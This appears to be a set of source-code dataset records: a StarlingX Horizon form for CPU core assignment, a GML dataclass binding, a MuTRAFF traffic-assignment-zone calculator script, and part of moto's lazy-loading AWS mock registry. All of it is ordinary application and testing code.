self.fields[
'num_cores_on_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor3'].help_text =\
"Processor 3 has %s physical cores." % avail_socket_cores
for s in range(0, 4):
processor = 'num_shared_on_processor{0}'.format(s)
if ('compute' not in self.host.subfunctions or
kwargs['initial'][processor] == 99): # No Processor
self.fields[processor].widget = forms.widgets.HiddenInput()
else:
self.fields[processor].set_max_value(1)
self.fields[processor].help_text =\
"Each processor can have at most one shared core."
def clean(self):
cleaned_data = super(UpdateCpuFunctions, self).clean()
# host_id = cleaned_data.get('host_id')
try:
cleaned_data['platform_processor0'] = str(
cleaned_data['platform_processor0'])
cleaned_data['platform_processor1'] = str(
cleaned_data['platform_processor1'])
cleaned_data['platform_processor2'] = str(
cleaned_data['platform_processor2'])
cleaned_data['platform_processor3'] = str(
cleaned_data['platform_processor3'])
cleaned_data['num_cores_on_processor0'] = str(
cleaned_data['num_cores_on_processor0'])
cleaned_data['num_cores_on_processor1'] = str(
cleaned_data['num_cores_on_processor1'])
cleaned_data['num_cores_on_processor2'] = str(
cleaned_data['num_cores_on_processor2'])
cleaned_data['num_cores_on_processor3'] = str(
cleaned_data['num_cores_on_processor3'])
cleaned_data['num_shared_on_processor0'] = str(
cleaned_data['num_shared_on_processor0'])
cleaned_data['num_shared_on_processor1'] = str(
cleaned_data['num_shared_on_processor1'])
cleaned_data['num_shared_on_processor2'] = str(
cleaned_data['num_shared_on_processor2'])
cleaned_data['num_shared_on_processor3'] = str(
cleaned_data['num_shared_on_processor3'])
num_platform_cores = {}
num_platform_cores[0] = cleaned_data.get('platform_processor0',
'None')
num_platform_cores[1] = cleaned_data.get('platform_processor1',
'None')
num_platform_cores[2] = cleaned_data.get('platform_processor2',
'None')
num_platform_cores[3] = cleaned_data.get('platform_processor3',
'None')
num_vswitch_cores = {}
num_vswitch_cores[0] = cleaned_data.get('num_cores_on_processor0',
'None')
num_vswitch_cores[1] = cleaned_data.get('num_cores_on_processor1',
'None')
num_vswitch_cores[2] = cleaned_data.get('num_cores_on_processor2',
'None')
num_vswitch_cores[3] = cleaned_data.get('num_cores_on_processor3',
'None')
num_shared_on_map = {}
num_shared_on_map[0] = cleaned_data.get('num_shared_on_processor0',
'None')
num_shared_on_map[1] = cleaned_data.get('num_shared_on_processor1',
'None')
num_shared_on_map[2] = cleaned_data.get('num_shared_on_processor2',
'None')
num_shared_on_map[3] = cleaned_data.get('num_shared_on_processor3',
'None')
if ('None' in num_platform_cores.values() or
'None' in num_vswitch_cores.values() or
'None' in num_shared_on_map.values()):
raise forms.ValidationError(_("Invalid entry."))
except Exception as e:
LOG.error(e)
raise forms.ValidationError(_("Invalid entry."))
# Since only vswitch is allowed to be modified
cleaned_data['function'] = 'vswitch'
# NOTE: shared_vcpu can be changed
return cleaned_data
def handle(self, request, data):
host_id = data['host_id']
del data['host_id']
del data['host']
try:
host = sysinv.host_get(self.request, host_id)
cpudata = {}
sharedcpudata = {}
platformcpudata = {}
for key, val in data.items():
if 'num_cores_on_processor' in key or 'function' in key:
if key not in self.fields:
cpudata[key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
cpudata[key] = val
if 'platform_processor' in key:
update_key = 'num_cores_on_processor' + key[-1:]
if key not in self.fields:
platformcpudata[update_key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
platformcpudata[update_key] = val
if 'num_shared_on_processor' in key:
key2 = key.replace('shared', 'cores')
if key not in self.fields:
sharedcpudata[key2] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
sharedcpudata[key2] = val
sharedcpudata['function'] = 'shared'
platformcpudata['function'] = 'platform'
sysinv.host_cpus_modify(request, host.uuid,
platformcpudata,
cpudata,
sharedcpudata)
msg = _('CPU Assignments were successfully updated.')
LOG.debug(msg)
messages.success(request, msg)
return self.host.cpus
except exc.ClientException as ce:
# Display REST API error message on UI
messages.error(request, ce)
LOG.error(ce)
# Redirect to failure pg
redirect = reverse(self.failure_url, args=[host_id])
return shortcuts.redirect(redirect)
except Exception as e:
LOG.exception(e)
msg = _('Failed to update CPU Assignments.')
LOG.info(msg)
redirect = reverse(self.failure_url, args=[host_id])
exceptions.handle(request, msg, redirect=redirect)
class AddCpuProfile(forms.SelfHandlingForm):
host_id = forms.CharField(widget=forms.widgets.HiddenInput)
profilename = forms.CharField(label=_("Cpu Profile Name"),
required=True)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(AddCpuProfile, self).__init__(*args, **kwargs)
def clean(self):
cleaned_data = super(AddCpuProfile, self).clean()
# host_id = cleaned_data.get('host_id')
return cleaned_data
def handle(self, request, data):
cpuProfileName = data['profilename']
try:
cpuProfile = sysinv.host_cpuprofile_create(request, **data)
msg = _(
'Cpu Profile "%s" was successfully created.') % cpuProfileName
LOG.debug(msg)
messages.success(request, msg)
return cpuProfile
except exc.ClientException as ce:
# Display REST API error message on UI
messages.error(request, ce)
LOG.error(ce)
# Redirect to failure pg
redirect = reverse(self.failure_url, args=[data['host_id']])
return shortcuts.redirect(redirect)
except Exception:
msg = _('Failed to create cpu profile "%s".') % cpuProfileName
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['host_id']])
exceptions.handle(request, msg, redirect=redirect)
| 43.07
| 79
| 0.557755
|
import logging
from cgtsclient import exc
from django.core.urlresolvers import reverse
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from starlingx_dashboard.api import sysinv
LOG = logging.getLogger(__name__)
class UpdateCpuFunctions(forms.SelfHandlingForm):
host = forms.CharField(label=_("host"),
required=False,
widget=forms.widgets.HiddenInput)
host_id = forms.CharField(label=_("host_id"),
required=False,
widget=forms.widgets.HiddenInput)
platform = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
platform_processor0 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
platform_processor1 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
platform_processor2 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
platform_processor3 = forms.DynamicIntegerField(
label=_("# of Platform Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
vswitch = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_cores_on_processor0 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor1 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor2 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_cores_on_processor3 = forms.DynamicIntegerField(
label=_("# of vSwitch Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
shared_vcpu = forms.CharField(
label=_("------------------------ Function ------------------------"),
required=False,
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
num_shared_on_processor0 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 0:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor1 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 1:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor2 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 2:"),
min_value=0, max_value=99,
required=False)
num_shared_on_processor3 = forms.DynamicIntegerField(
label=_("# of Shared Physical Cores on Processor 3:"),
min_value=0, max_value=99,
required=False)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(UpdateCpuFunctions, self).__init__(*args, **kwargs)
self.host = kwargs['initial']['host']
if kwargs['initial']['platform_processor0'] == 99:
self.fields[
'platform_processor0'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields['platform_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor1'] == 99:
self.fields[
'platform_processor1'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields['platform_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor2'] == 99:
self.fields[
'platform_processor2'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields['platform_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor2'].help_text = \
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial']['platform_processor3'] == 99:
self.fields[
'platform_processor3'].widget = forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields['platform_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'platform_processor3'].help_text = \
"Processor 3 has %s physical cores." % avail_socket_cores
if 'compute' not in self.host.subfunctions:
self.fields['vswitch'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor0'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor1'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor2'].widget = forms.widgets.HiddenInput()
self.fields[
'num_cores_on_processor3'].widget = forms.widgets.HiddenInput()
else:
if kwargs['initial'][
'num_cores_on_processor0'] == 99:
self.fields[
'num_cores_on_processor0'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(0, 0)
self.fields[
'num_cores_on_processor0'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor0'].help_text = \
"Processor 0 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor1'] == 99:
self.fields[
'num_cores_on_processor1'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(1, 0)
self.fields[
'num_cores_on_processor1'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor1'].help_text =\
"Processor 1 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor2'] == 99:
self.fields[
'num_cores_on_processor2'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(2, 0)
self.fields[
'num_cores_on_processor2'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor2'].help_text =\
"Processor 2 has %s physical cores." % avail_socket_cores
if kwargs['initial'][
'num_cores_on_processor3'] == 99:
self.fields[
'num_cores_on_processor3'].widget =\
forms.widgets.HiddenInput()
else:
avail_socket_cores = self.host.physical_cores.get(3, 0)
self.fields[
'num_cores_on_processor3'].set_max_value(
avail_socket_cores)
self.fields[
'num_cores_on_processor3'].help_text =\
"Processor 3 has %s physical cores." % avail_socket_cores
for s in range(0, 4):
processor = 'num_shared_on_processor{0}'.format(s)
if ('compute' not in self.host.subfunctions or
kwargs['initial'][processor] == 99):
self.fields[processor].widget = forms.widgets.HiddenInput()
else:
self.fields[processor].set_max_value(1)
self.fields[processor].help_text =\
"Each processor can have at most one shared core."
def clean(self):
cleaned_data = super(UpdateCpuFunctions, self).clean()
try:
cleaned_data['platform_processor0'] = str(
cleaned_data['platform_processor0'])
cleaned_data['platform_processor1'] = str(
cleaned_data['platform_processor1'])
cleaned_data['platform_processor2'] = str(
cleaned_data['platform_processor2'])
cleaned_data['platform_processor3'] = str(
cleaned_data['platform_processor3'])
cleaned_data['num_cores_on_processor0'] = str(
cleaned_data['num_cores_on_processor0'])
cleaned_data['num_cores_on_processor1'] = str(
cleaned_data['num_cores_on_processor1'])
cleaned_data['num_cores_on_processor2'] = str(
cleaned_data['num_cores_on_processor2'])
cleaned_data['num_cores_on_processor3'] = str(
cleaned_data['num_cores_on_processor3'])
cleaned_data['num_shared_on_processor0'] = str(
cleaned_data['num_shared_on_processor0'])
cleaned_data['num_shared_on_processor1'] = str(
cleaned_data['num_shared_on_processor1'])
cleaned_data['num_shared_on_processor2'] = str(
cleaned_data['num_shared_on_processor2'])
cleaned_data['num_shared_on_processor3'] = str(
cleaned_data['num_shared_on_processor3'])
num_platform_cores = {}
num_platform_cores[0] = cleaned_data.get('platform_processor0',
'None')
num_platform_cores[1] = cleaned_data.get('platform_processor1',
'None')
num_platform_cores[2] = cleaned_data.get('platform_processor2',
'None')
num_platform_cores[3] = cleaned_data.get('platform_processor3',
'None')
num_vswitch_cores = {}
num_vswitch_cores[0] = cleaned_data.get('num_cores_on_processor0',
'None')
num_vswitch_cores[1] = cleaned_data.get('num_cores_on_processor1',
'None')
num_vswitch_cores[2] = cleaned_data.get('num_cores_on_processor2',
'None')
num_vswitch_cores[3] = cleaned_data.get('num_cores_on_processor3',
'None')
num_shared_on_map = {}
num_shared_on_map[0] = cleaned_data.get('num_shared_on_processor0',
'None')
num_shared_on_map[1] = cleaned_data.get('num_shared_on_processor1',
'None')
num_shared_on_map[2] = cleaned_data.get('num_shared_on_processor2',
'None')
num_shared_on_map[3] = cleaned_data.get('num_shared_on_processor3',
'None')
if ('None' in num_platform_cores.values() or
'None' in num_vswitch_cores.values() or
'None' in num_shared_on_map.values()):
raise forms.ValidationError(_("Invalid entry."))
except Exception as e:
LOG.error(e)
raise forms.ValidationError(_("Invalid entry."))
cleaned_data['function'] = 'vswitch'
return cleaned_data
def handle(self, request, data):
host_id = data['host_id']
del data['host_id']
del data['host']
try:
host = sysinv.host_get(self.request, host_id)
cpudata = {}
sharedcpudata = {}
platformcpudata = {}
for key, val in data.items():
if 'num_cores_on_processor' in key or 'function' in key:
if key not in self.fields:
cpudata[key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
cpudata[key] = val
if 'platform_processor' in key:
update_key = 'num_cores_on_processor' + key[-1:]
if key not in self.fields:
platformcpudata[update_key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
platformcpudata[update_key] = val
if 'num_shared_on_processor' in key:
key2 = key.replace('shared', 'cores')
if key not in self.fields:
sharedcpudata[key2] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
sharedcpudata[key2] = val
sharedcpudata['function'] = 'shared'
platformcpudata['function'] = 'platform'
sysinv.host_cpus_modify(request, host.uuid,
platformcpudata,
cpudata,
sharedcpudata)
msg = _('CPU Assignments were successfully updated.')
LOG.debug(msg)
messages.success(request, msg)
return self.host.cpus
except exc.ClientException as ce:
messages.error(request, ce)
LOG.error(ce)
redirect = reverse(self.failure_url, args=[host_id])
return shortcuts.redirect(redirect)
except Exception as e:
LOG.exception(e)
msg = _('Failed to update CPU Assignments.')
LOG.info(msg)
redirect = reverse(self.failure_url, args=[host_id])
exceptions.handle(request, msg, redirect=redirect)
class AddCpuProfile(forms.SelfHandlingForm):
host_id = forms.CharField(widget=forms.widgets.HiddenInput)
profilename = forms.CharField(label=_("Cpu Profile Name"),
required=True)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(AddCpuProfile, self).__init__(*args, **kwargs)
def clean(self):
cleaned_data = super(AddCpuProfile, self).clean()
return cleaned_data
def handle(self, request, data):
cpuProfileName = data['profilename']
try:
cpuProfile = sysinv.host_cpuprofile_create(request, **data)
msg = _(
'Cpu Profile "%s" was successfully created.') % cpuProfileName
LOG.debug(msg)
messages.success(request, msg)
return cpuProfile
except exc.ClientException as ce:
messages.error(request, ce)
LOG.error(ce)
redirect = reverse(self.failure_url, args=[data['host_id']])
return shortcuts.redirect(redirect)
except Exception:
msg = _('Failed to create cpu profile "%s".') % cpuProfileName
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['host_id']])
exceptions.handle(request, msg, redirect=redirect)
| true
| true
|
f7191d9a9dc651d2b6f271add852f02c238d421a
| 272
|
py
|
Python
|
catalog/bindings/csw/crs_ref.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
catalog/bindings/csw/crs_ref.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
catalog/bindings/csw/crs_ref.py
|
NIVANorge/s-enda-playground
|
56ae0a8978f0ba8a5546330786c882c31e17757a
|
[
"Apache-2.0"
] | null | null | null |
from dataclasses import dataclass
from bindings.csw.general_conversion_ref_type import CrsrefType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class CrsRef(CrsrefType):
class Meta:
name = "crsRef"
namespace = "http://www.opengis.net/gml"
| 22.666667
| 63
| 0.731618
|
from dataclasses import dataclass
from bindings.csw.general_conversion_ref_type import CrsrefType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class CrsRef(CrsrefType):
class Meta:
name = "crsRef"
namespace = "http://www.opengis.net/gml"
| true
| true
|
f7191efcb8f233967b15e0f9433e0c54a591c370
| 3,760
|
py
|
Python
|
tools/TAZ_CALCULATOR/mutraff_tazcalc.py
|
uahservtel/uah-gist-mutraff-bastra
|
b5a4eab4763e1cf9d914c4af8a77426391e71e31
|
[
"Xnet",
"Linux-OpenIB",
"X11"
] | 3
|
2019-11-20T15:22:27.000Z
|
2021-06-13T07:52:14.000Z
|
tools/TAZ_CALCULATOR/mutraff_tazcalc.py
|
uahservtel/uah-gist-mutraff-bastra
|
b5a4eab4763e1cf9d914c4af8a77426391e71e31
|
[
"Xnet",
"Linux-OpenIB",
"X11"
] | null | null | null |
tools/TAZ_CALCULATOR/mutraff_tazcalc.py
|
uahservtel/uah-gist-mutraff-bastra
|
b5a4eab4763e1cf9d914c4af8a77426391e71e31
|
[
"Xnet",
"Linux-OpenIB",
"X11"
] | null | null | null |
'''
Created on 09/12/2016
@author: Alvaro Paricio
@description: Calculator of TRAFFIC ASSIGNMENT ZONES (TAZ). Given a networkfile and a polygon description, get all the nodes of the network included inside the polygon.
'''
import sys
sys.path.insert(1,'lib')
import argparse as arg
from TazGeometry import taz_test, MuTazCalculator
# --------------------------------------------------------------
opts= {}
# --------------------------------------------------------------
def getConfig():
parser = arg.ArgumentParser(
prog="mutraff_tazcalc",
formatter_class=arg.RawDescriptionHelpFormatter,
description='''\
MuTRAFF TAZ Calculator
Given an XML taz definition file based on polygon coordinates in GPS format(lat,lon), generate the associated SUMO TAZ definiton file with the edges contained inside each taz polygon.
Examples:
* Generate the TAZs associated to a given polygon:
python mutraff_tazcalc.py -net alcalahenares.net.xml -nod alcalahenares.nod.xml -edg alcalahenares.edg.xml -mutaz alcalahenares.mutaz.xml -sumo_taz alcalahenares.taz.xml
''')
# REQUIRED OPTS
parser.add_argument( "-net","--in-net", help='Input. SUMOs XML net description file', default="mutraff.net.xml", required=True)
parser.add_argument( "-nod","--in-nodes", help='Input. SUMOs XML nodes description file', default="mutraff.nod.xml", required=True)
parser.add_argument( "-edg","--in-edges", help='Input. SUMOs XML edges description file', default="mutraff.edg.xml", required=True)
parser.add_argument( "-mutaz","--in-mutaz", help='Input. MUTRAFF XML description file', default="mutraff.mutaz.xml", required=True)
# OPTIONAL OPTS
parser.add_argument( "-sumo_taz","--out-sumo-taz", help='Output. Generate output to SUMO TAZ XML description file', required=False)
parser.add_argument( "-p","--net-path", help='Input. Path to locate files', default='.' )
parser.add_argument( "-v","--verbose", help='Verbose output', default=False, action='store_true')
parser.add_argument( "-t","--run-tests", help='Run tests', default=False, action='store_true')
parser.add_argument( "-i","--taz-id-seed", help='USe this number as TAZ id numbering seed', default="1000", required=False)
options = vars(parser.parse_args())
options['in_net'] = options['net_path'] + '/' + options['in_net']
options['in_nodes'] = options['net_path'] + '/' + options['in_nodes']
options['in_edges'] = options['net_path'] + '/' + options['in_edges']
options['in_mutaz'] = options['net_path'] + '/' + options['in_mutaz']
if 'out_sumo_taz' in options and options['out_sumo_taz']:
options['out_sumo_taz'] = options['net_path'] + '/' + options['out_sumo_taz']
if( options['verbose'] ):
print(options)
return options
# --------------------------------------------------------------
def printBanner():
# Take here the banner: http://patorjk.com/software/taag/#p=display&f=Doom&t=mutraff%20odgen
# Font: Doom
print(" _ __ __ _ _ ")
print(" | | / _|/ _| | | | | ")
print(" _ __ ___ _ _| |_ _ __ __ _| |_| |_ | |_ __ _ _______ __ _| | ___ ")
print("| '_ ` _ \| | | | __| '__/ _` | _| _| | __/ _` |_ / __/ _` | |/ __|")
print("| | | | | | |_| | |_| | | (_| | | | | | || (_| |/ / (_| (_| | | (__ ")
print("|_| |_| |_|\__,_|\__|_| \__,_|_| |_| \__\__,_/___\___\__,_|_|\___|\n")
print(" MUTRAFF TAZ Calculator")
print(" alvaro.paricio@uah.es")
print("")
if __name__ == '__main__':
printBanner()
opts=getConfig()
if( opts['run_tests'] ):
taz_test()
else:
tazcalc = MuTazCalculator(opts)
tazcalc.loadData()
tazcalc.calculateTazs()
tazcalc.dumpTazFile()
| 45.301205
| 183
| 0.611702
|
import sys
sys.path.insert(1,'lib')
import argparse as arg
from TazGeometry import taz_test, MuTazCalculator
opts= {}
def getConfig():
parser = arg.ArgumentParser(
prog="mutraff_tazcalc",
formatter_class=arg.RawDescriptionHelpFormatter,
description='''\
MuTRAFF TAZ Calculator
Given an XML taz definition file based on polygon coordinates in GPS format(lat,lon), generate the associated SUMO TAZ definiton file with the edges contained inside each taz polygon.
Examples:
* Generate the TAZs associated to a given polygon:
python mutraff_tazcalc.py -net alcalahenares.net.xml -nod alcalahenares.nod.xml -edg alcalahenares.edg.xml -mutaz alcalahenares.mutaz.xml -sumo_taz alcalahenares.taz.xml
''')
parser.add_argument( "-net","--in-net", help='Input. SUMOs XML net description file', default="mutraff.net.xml", required=True)
parser.add_argument( "-nod","--in-nodes", help='Input. SUMOs XML nodes description file', default="mutraff.nod.xml", required=True)
parser.add_argument( "-edg","--in-edges", help='Input. SUMOs XML edges description file', default="mutraff.edg.xml", required=True)
parser.add_argument( "-mutaz","--in-mutaz", help='Input. MUTRAFF XML description file', default="mutraff.mutaz.xml", required=True)
parser.add_argument( "-sumo_taz","--out-sumo-taz", help='Output. Generate output to SUMO TAZ XML description file', required=False)
parser.add_argument( "-p","--net-path", help='Input. Path to locate files', default='.' )
parser.add_argument( "-v","--verbose", help='Verbose output', default=False, action='store_true')
parser.add_argument( "-t","--run-tests", help='Run tests', default=False, action='store_true')
parser.add_argument( "-i","--taz-id-seed", help='USe this number as TAZ id numbering seed', default="1000", required=False)
options = vars(parser.parse_args())
options['in_net'] = options['net_path'] + '/' + options['in_net']
options['in_nodes'] = options['net_path'] + '/' + options['in_nodes']
options['in_edges'] = options['net_path'] + '/' + options['in_edges']
options['in_mutaz'] = options['net_path'] + '/' + options['in_mutaz']
if 'out_sumo_taz' in options and options['out_sumo_taz']:
options['out_sumo_taz'] = options['net_path'] + '/' + options['out_sumo_taz']
if( options['verbose'] ):
print(options)
return options
def printBanner():
__ __ _ _ ")
print(" | | / _|/ _| | | | | ")
print(" _ __ ___ _ _| |_ _ __ __ _| |_| |_ | |_ __ _ _______ __ _| | ___ ")
print("| '_ ` _ \| | | | __| '__/ _` | _| _| | __/ _` |_ / __/ _` | |/ __|")
print("| | | | | | |_| | |_| | | (_| | | | | | || (_| |/ / (_| (_| | | (__ ")
print("|_| |_| |_|\__,_|\__|_| \__,_|_| |_| \__\__,_/___\___\__,_|_|\___|\n")
print(" MUTRAFF TAZ Calculator")
print(" alvaro.paricio@uah.es")
print("")
if __name__ == '__main__':
printBanner()
opts=getConfig()
if( opts['run_tests'] ):
taz_test()
else:
tazcalc = MuTazCalculator(opts)
tazcalc.loadData()
tazcalc.calculateTazs()
tazcalc.dumpTazFile()
| true
| true
|
f7191f1eaaa578d51a94826ccc2ece39d7ec093d
| 9,695
|
py
|
Python
|
moto/__init__.py
|
hudelgado/moto
|
b8cd79cd06a6cc591b0a51086ead50609af4dd4d
|
[
"Apache-2.0"
] | null | null | null |
moto/__init__.py
|
hudelgado/moto
|
b8cd79cd06a6cc591b0a51086ead50609af4dd4d
|
[
"Apache-2.0"
] | null | null | null |
moto/__init__.py
|
hudelgado/moto
|
b8cd79cd06a6cc591b0a51086ead50609af4dd4d
|
[
"Apache-2.0"
] | null | null | null |
import importlib
import sys
from contextlib import ContextDecorator
def lazy_load(
    module_name, element, boto3_name=None, backend=None, warn_repurpose=False
):
    """Return a callable proxy that imports ``element`` from ``module_name``
    only when first invoked.

    The proxy carries metadata attributes used elsewhere in moto:
    ``name`` (module name with dots stripped), ``element``, ``boto3_name``
    (defaults to ``name``) and ``backend`` (defaults to ``<name>_backends``).
    If ``warn_repurpose`` is set, a DeprecationWarning-style message is emitted
    on every call before the real decorator runs.
    """
    def wrapper(*args, **kwargs):
        if warn_repurpose:
            import warnings

            warnings.warn(
                f"Module {element} has been deprecated, and will be repurposed in a later release. "
                "Please see https://github.com/spulec/moto/issues/4526 for more information."
            )
        # Resolve lazily so importing moto itself stays cheap.
        target = importlib.import_module(module_name, "moto")
        return getattr(target, element)(*args, **kwargs)

    wrapper.name = module_name.replace(".", "")
    wrapper.element = element
    wrapper.boto3_name = boto3_name if boto3_name else wrapper.name
    wrapper.backend = backend if backend else f"{wrapper.name}_backends"
    return wrapper
# One lazy mock decorator per AWS service. Each name resolves to the real
# implementation inside its moto submodule only when first called (see
# lazy_load above), so importing moto does not import every service backend.
# "_deprecated" variants mirror the old boto(2) decorators; warn_repurpose
# marks decorators whose meaning will change in a future release.
mock_acm = lazy_load(".acm", "mock_acm")
mock_apigateway = lazy_load(".apigateway", "mock_apigateway")
mock_apigateway_deprecated = lazy_load(".apigateway", "mock_apigateway_deprecated")
mock_athena = lazy_load(".athena", "mock_athena")
mock_applicationautoscaling = lazy_load(
    ".applicationautoscaling", "mock_applicationautoscaling"
)
mock_autoscaling = lazy_load(".autoscaling", "mock_autoscaling")
mock_autoscaling_deprecated = lazy_load(".autoscaling", "mock_autoscaling_deprecated")
# "lambda" is a Python keyword, hence the awslambda module / explicit boto3_name.
mock_lambda = lazy_load(
    ".awslambda", "mock_lambda", boto3_name="lambda", backend="lambda_backends"
)
mock_lambda_deprecated = lazy_load(".awslambda", "mock_lambda_deprecated")
mock_batch = lazy_load(".batch", "mock_batch")
mock_budgets = lazy_load(".budgets", "mock_budgets")
mock_cloudformation = lazy_load(".cloudformation", "mock_cloudformation")
mock_cloudformation_deprecated = lazy_load(
    ".cloudformation", "mock_cloudformation_deprecated"
)
mock_cloudfront = lazy_load(".cloudfront", "mock_cloudfront")
mock_cloudtrail = lazy_load(".cloudtrail", "mock_cloudtrail", boto3_name="cloudtrail")
mock_cloudwatch = lazy_load(".cloudwatch", "mock_cloudwatch")
mock_cloudwatch_deprecated = lazy_load(".cloudwatch", "mock_cloudwatch_deprecated")
mock_codecommit = lazy_load(".codecommit", "mock_codecommit")
mock_codepipeline = lazy_load(".codepipeline", "mock_codepipeline")
mock_cognitoidentity = lazy_load(
    ".cognitoidentity", "mock_cognitoidentity", boto3_name="cognito-identity"
)
mock_cognitoidentity_deprecated = lazy_load(
    ".cognitoidentity", "mock_cognitoidentity_deprecated"
)
mock_cognitoidp = lazy_load(".cognitoidp", "mock_cognitoidp", boto3_name="cognito-idp")
mock_cognitoidp_deprecated = lazy_load(".cognitoidp", "mock_cognitoidp_deprecated")
mock_config = lazy_load(".config", "mock_config")
mock_datapipeline = lazy_load(".datapipeline", "mock_datapipeline")
mock_datapipeline_deprecated = lazy_load(
    ".datapipeline", "mock_datapipeline_deprecated"
)
mock_datasync = lazy_load(".datasync", "mock_datasync")
mock_dms = lazy_load(".dms", "mock_dms")
mock_ds = lazy_load(".ds", "mock_ds", boto3_name="ds")
mock_dynamodb = lazy_load(".dynamodb", "mock_dynamodb", warn_repurpose=True)
mock_dynamodb_deprecated = lazy_load(".dynamodb", "mock_dynamodb_deprecated")
mock_dynamodb2 = lazy_load(".dynamodb2", "mock_dynamodb2", backend="dynamodb_backends2")
mock_dynamodb2_deprecated = lazy_load(".dynamodb2", "mock_dynamodb2_deprecated")
mock_dynamodbstreams = lazy_load(".dynamodbstreams", "mock_dynamodbstreams")
mock_elasticbeanstalk = lazy_load(
    ".elasticbeanstalk", "mock_elasticbeanstalk", backend="eb_backends"
)
mock_ec2 = lazy_load(".ec2", "mock_ec2")
mock_ec2_deprecated = lazy_load(".ec2", "mock_ec2_deprecated")
mock_ec2instanceconnect = lazy_load(".ec2instanceconnect", "mock_ec2instanceconnect")
mock_ecr = lazy_load(".ecr", "mock_ecr")
mock_ecr_deprecated = lazy_load(".ecr", "mock_ecr_deprecated")
mock_ecs = lazy_load(".ecs", "mock_ecs")
mock_ecs_deprecated = lazy_load(".ecs", "mock_ecs_deprecated")
mock_elastictranscoder = lazy_load(".elastictranscoder", "mock_elastictranscoder")
mock_elb = lazy_load(".elb", "mock_elb")
mock_elb_deprecated = lazy_load(".elb", "mock_elb_deprecated")
mock_elbv2 = lazy_load(".elbv2", "mock_elbv2")
mock_emr = lazy_load(".emr", "mock_emr")
mock_emr_deprecated = lazy_load(".emr", "mock_emr_deprecated")
mock_emrcontainers = lazy_load(
    ".emrcontainers", "mock_emrcontainers", boto3_name="emr-containers"
)
mock_events = lazy_load(".events", "mock_events")
mock_firehose = lazy_load(".firehose", "mock_firehose")
mock_forecast = lazy_load(".forecast", "mock_forecast")
mock_glacier = lazy_load(".glacier", "mock_glacier")
mock_glacier_deprecated = lazy_load(".glacier", "mock_glacier_deprecated")
mock_glue = lazy_load(".glue", "mock_glue")
